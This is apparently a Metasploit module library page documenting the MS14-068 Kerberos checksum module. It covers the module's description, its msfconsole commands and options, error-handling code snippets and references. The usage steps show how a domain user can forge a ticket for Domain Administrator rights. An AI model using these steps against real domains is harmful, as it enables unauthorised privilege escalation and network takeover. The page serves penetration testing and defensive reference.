MS14-068 Microsoft Kerberos Checksum Validation Vulnerability - Metasploit
This page contains detailed information about how to use the auxiliary/admin/kerberos/ms14_068_kerberos_checksum metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Source code: modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
Disclosure date: 2014-11-18
Last modification time: 2022-04-08 11:35:31 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 88
List of CVEs: CVE-2014-6324
This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS request, where a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz help. It has been tested successfully on Windows 2008.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show targets
... a list of targets ...
msf auxiliary(ms14_068_kerberos_checksum) > set TARGET target-id
msf auxiliary(ms14_068_kerberos_checksum) > show options
... show and set options ...
msf auxiliary(ms14_068_kerberos_checksum) > exploit
Required Options
RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
USER: The Domain User
PASSWORD: The Domain User password
DOMAIN: The Domain (upper case) Ex: DEMO.LOCAL
USER_SID: The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Go back to menu.
Msfconsole Usage
Here is how the admin/kerberos/ms14_068_kerberos_checksum auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show info
Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2014-11-18
Provided by:
Tom Maddock
Sylvain Monne
juan vazquez <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD yes The Domain User password
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER yes The Domain User
USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Description:
This module exploits a vulnerability in the Microsoft Kerberos
implementation. The problem exists in the verification of the
Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
where a domain user may forge a PAC with arbitrary privileges,
including Domain Administrator. This module requests a TGT ticket
with a forged PAC and exports it to a MIT Kerberos Credential Cache
file. It can be loaded on Windows systems with the Mimikatz help. It
has been tested successfully on Windows 2008.
References:
https://nvd.nist.gov/vuln/detail/CVE-2014-6324
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/MS14-068
OSVDB (114751)
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
https://github.com/bidord/pykek
https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
Module Options
This is a complete list of options available in the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show options
Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD yes The Domain User password
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER yes The Domain User
USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Advanced Options
Here is a complete list of advanced options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show advanced
Module advanced options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/kerberos/ms14_068_kerberos_checksum module can do:
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the admin/kerberos/ms14_068_kerberos_checksum auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/kerberos/ms14_068_kerberos_checksum) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
Here is a relevant code snippet related to the "Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000" error message:
49:
50: def run
51: print_status("Validating options...")
52:
53: unless datastore['USER_SID'] =~ /^S-(\d+-){6}\d+$/
54: print_error("Invalid USER_SID. Ex: S-1-5-21-1755879683-3641577184-3486455962-1000")
55: return
56: end
57:
58: domain = datastore['DOMAIN'].upcase
59:
<PEER> - Invalid AS-REP, aborting...
Here is a relevant code snippet related to the "<PEER> - Invalid AS-REP, aborting..." error message:
80: pa_data: pre_auth
81: )
82:
83: unless res.msg_type == Rex::Proto::Kerberos::Model::AS_REP
84: print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
85: print_error("#{peer} - Invalid AS-REP, aborting...")
86: return
87: end
88:
89: print_status("#{peer} - Parsing AS-REP...")
90:
<PEER> - Invalid TGS-REP, aborting...
Here is a relevant code snippet related to the "<PEER> - Invalid TGS-REP, aborting..." error message:
129: subkey: sub_key
130: )
131:
132: unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
133: print_warning("#{peer} - #{warn_error(res)}") if res.msg_type == Rex::Proto::Kerberos::Model::KRB_ERROR
134: print_error("#{peer} - Invalid TGS-REP, aborting...")
135: return
136: end
137:
138: print_good("#{peer} - Valid TGS-Response, extracting credentials...")
139:
<ERROR_INFO:0> - <ERROR_INFO:1>
Here is a relevant code snippet related to the "<ERROR_INFO:0> - <ERROR_INFO:1>" error message:
146: def warn_error(res)
147: msg = ''
148:
149: if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
150: error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
151: msg = "#{error_info[0]} - #{error_info[1]}"
152: else
153: msg = 'Unknown error'
154: end
155:
156: msg
Unknown error
Here is a relevant code snippet related to the "Unknown error" error message:
148:
149: if Rex::Proto::Kerberos::Model::ERROR_CODES.has_key?(res.error_code)
150: error_info = Rex::Proto::Kerberos::Model::ERROR_CODES[res.error_code]
151: msg = "#{error_info[0]} - #{error_info[1]}"
152: else
153: msg = 'Unknown error'
154: end
155:
156: msg
157: end
158: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12949 Merged Pull Request: This fixes broken links to the community.rapid7.com blog
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6086 Merged Pull Request: Fix Kerberos Client mixin Namespace
- #5123 Merged Pull Request: Fix spelling of Microsoft in module name
- #4495 Merged Pull Request: Minor grammar fixes on modules
- #4456 Merged Pull Request: Module for MS14-068, Kerberos Checksum (and krb protocol support)
References
- CVE-2014-6324
- MS14-068
- OSVDB (114751)
- http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
- https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
- https://github.com/bidord/pykek
- https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
See Also
Check also the following modules related to this module:
- auxiliary/gather/kerberos_enumusers
- post/multi/gather/unix_kerberos_tickets
- auxiliary/gather/ms14_052_xmldom
- exploit/windows/browser/ms14_012_cmarkup_uaf
- exploit/windows/browser/ms14_012_textrange
- exploit/windows/browser/ms14_064_ole_code_execution
- exploit/windows/fileformat/ms14_017_rtf
- exploit/windows/fileformat/ms14_060_sandworm
- exploit/windows/fileformat/ms14_064_packager_python
- exploit/windows/fileformat/ms14_064_packager_run_as_admin
- exploit/windows/local/ms14_009_ie_dfsvc
- exploit/windows/local/ms14_058_track_popup_menu
- exploit/windows/local/ms14_070_tcpip_ioctl
- exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684
Authors
- Tom Maddock
- Sylvain Monne
- juan vazquez
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.